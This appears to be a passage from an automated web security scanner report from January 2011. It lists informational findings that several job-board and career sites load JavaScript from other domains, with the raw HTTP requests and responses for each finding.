Issue detail

The response dynamically includes the following script from another domain:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js

Request

GET /push-yourself-outside-your-comfort-zone/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:38 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=5o76npmpltlll2h6khib1qgu27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648499; expires=Sat, 21-Jan-2012 22:21:39 GMT; path=/
Link: <http://www.aharrisonbarnes.com/?p=14138>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 141561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.14. http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen

Issue detail

The response dynamically includes the following script from another domain:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js

Request

Response

HTTP/1.1 404 Not Found
Date: Sat, 22 Jan 2011 00:14:21 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dtob70g4f8pltdn39q5stffbl1; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Last-Modified: Sat, 22 Jan 2011 00:14:23 GMT
Set-Cookie: wpgb_visit_last_php-default=1295655263; expires=Sun, 22-Jan-2012 00:14:23 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 100571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.15. http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/javascript/ad.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/wp-content/themes/HB_new_theme/javascript/ad.js

Issue detail

The response dynamically includes the following script from another domain:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js

Request

GET /wp-content/themes/HB_new_theme/javascript/ad.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.aharrisonbarnes.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:15:26 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Sat, 03 Jul 2010 13:10:45 GMT
ETag: "c10c73-5e1-48a7b6e6b9f40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 1505

function displayad()
{
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
var m3_u = (location.protocol=='https:'?'https://srvr12.pdcsrvr.com/media/www/
...[SNIP]...

15.16. http://www.answers.com/topic/vinson-elkins-llp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.answers.com
Path:	/topic/vinson-elkins-llp

Issue detail

The response dynamically includes the following scripts from other domains:

http://en.site2.answcdn.com/templates/scripts/~XbOSxt.js?v=78757
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://site.answcdn.com/main77409/js-utils/answ_utils1337975.js

Request

GET /topic/vinson-elkins-llp HTTP/1.1
Host: www.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:39:52 GMT
Server: AWS
Set-Cookie: lc=nt013; path=/; domain=www.answers.com; expires=Fri, 04-Feb-2011 18:39:52 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=05EA67FCD231E20FB8B1E7B8BD5DBA11; Path=/
Set-Cookie: settings=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Expires=Sat, 21-Jan-2012 18:39:52 GMT; Path=/
Set-Cookie: settingsS=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Path=/
Set-Cookie: afid=0; Expires=Sun, 13-Jan-2041 18:39:52 GMT; Path=/
Set-Cookie: GNFirstVisit=1295635192020; Expires=Sun, 13-Jan-2041 18:39:52 GMT; Path=/
Set-Cookie: tacodaSession=; Path=/
Set-Cookie: nafid=0; Path=/
Set-Cookie: referrerDomainSession=none; Path=/
Set-Cookie: firstPageTypeSession=topic-page; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 69874

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="IE IEnew IE7" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.
...[SNIP]...
<link rel="shortcut icon" href="http://www.answers.com/favicon.ico">
<script charset="utf-8" type="text/javascript" src="http://en.site2.answcdn.com/templates/scripts/~XbOSxt.js?v=78757"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://site.answcdn.com/main77409/js-utils/answ_utils1337975.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

15.17. http://www.architecturecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.architecturecrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.architecturecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:50 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u8cdprgtig27p3jst5fgnvcol0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125304

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.18. http://www.attorneyresume.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.attorneyresume.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.attorneyresume.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.19. http://www.auditorcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.auditorcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.auditorcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=16al60hefdulh9nl41fvb7adh1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125427

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.20. http://www.automotivecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.automotivecrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.automotivecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=chphkc8gns7vn2rq112ej1g8s5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109012

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.21. http://www.aviationcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aviationcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.aviationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5ito8gdqrme71tdpjpbd47goi6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 123144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.22. http://www.bcgsearch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bcgsearch.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.23. http://www.bilingualcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bilingualcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.bilingualcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:03 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3jv1797bk3m69qp27lbh4qrqj2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133153

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.24. http://www.biotechcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.biotechcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.biotechcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:05 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u6vsjargff90aq2r4fvrep9g90; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119741

